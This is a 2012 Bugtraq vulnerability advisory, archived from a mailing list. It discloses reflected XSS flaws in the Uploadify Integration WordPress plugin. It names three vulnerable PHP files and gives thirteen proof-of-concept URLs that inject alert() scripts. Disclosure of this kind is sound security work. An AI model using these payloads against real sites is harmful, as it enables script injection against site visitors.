lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <201204061402.q36E2oio000450@sf01web3.securityfocus.com>
Date: Fri, 6 Apr 2012 14:02:50 GMT
From: come2waraxe@...oo.com
To: bugtraq@...urityfocus.com
Subject: [waraxe-2012-SA#085] - Reflected XSS in Uploadify Integration
 Wordpress plugin


[waraxe-2012-SA#085] - Reflected XSS in Uploadify Integration Wordpress plugin
===============================================================================

Author: Janek Vind "waraxe"
Date: 06. April 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-85.html


Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Uploadify Integration allows you to insert a jQuery uploadify uploader into your
forms. Features: Uses jQuery Uploadify, Automatically saves to post meta, user
meta, an option, or temporary depending on the metaType selected by the shortcode.
Allows more than one shortcode per page.

http://wordpress.org/extend/plugins/uploadify-integration/


Vulnerable versions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Affected is Uploadify Integration 0.9.6, older versions may be affected as well.


###############################################################################
1. Reflected XSS vulnerability in "views/scripts/shortcode/index.php"
###############################################################################

Reason: outputting html data without proper encoding
Attack vector: user submitted GET or POST parameters
Preconditions: "register_globals=On"
Result: XSS attack possibilities

Tests:

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?buttontext="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?filetypeexts="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?filetypedesc="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?filesizelimit="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?uploadmode="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?metatype="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?parentid="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?path="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
shortcode/index.php?url="><script>alert(String.fromCharCode(88,83,83))</script>

Result: XSS payload execution can be observed


###############################################################################
2. Reflected XSS vulnerability in "views/scripts/partials/file.php"
###############################################################################

Reason: outputting html data without proper encoding
Attack vector: user submitted GET or POST parameters
Preconditions: "register_globals=On"
Result: XSS attack possibilities

Tests:

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
partials/file.php?fileid="><script>alert(String.fromCharCode(88,83,83))</script>

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
partials/file.php?inputname="><script>alert(String.fromCharCode(88,83,83))</script>

Result: XSS payload execution can be observed


###############################################################################
3. Reflected XSS vulnerability in "views/scripts/file/error.php"
###############################################################################

Reason: outputting html data without proper encoding
Attack vector: user submitted GET or POST parameters
Preconditions: "register_globals=On"
Result: XSS attack possibilities

Tests:

http://localhost/wp331/wp-content/plugins/uploadify-integration/views/scripts/
file/error.php?error="><script>alert(String.fromCharCode(88,83,83))</script>

Result: XSS payload execution can be observed


Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@...oo.com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ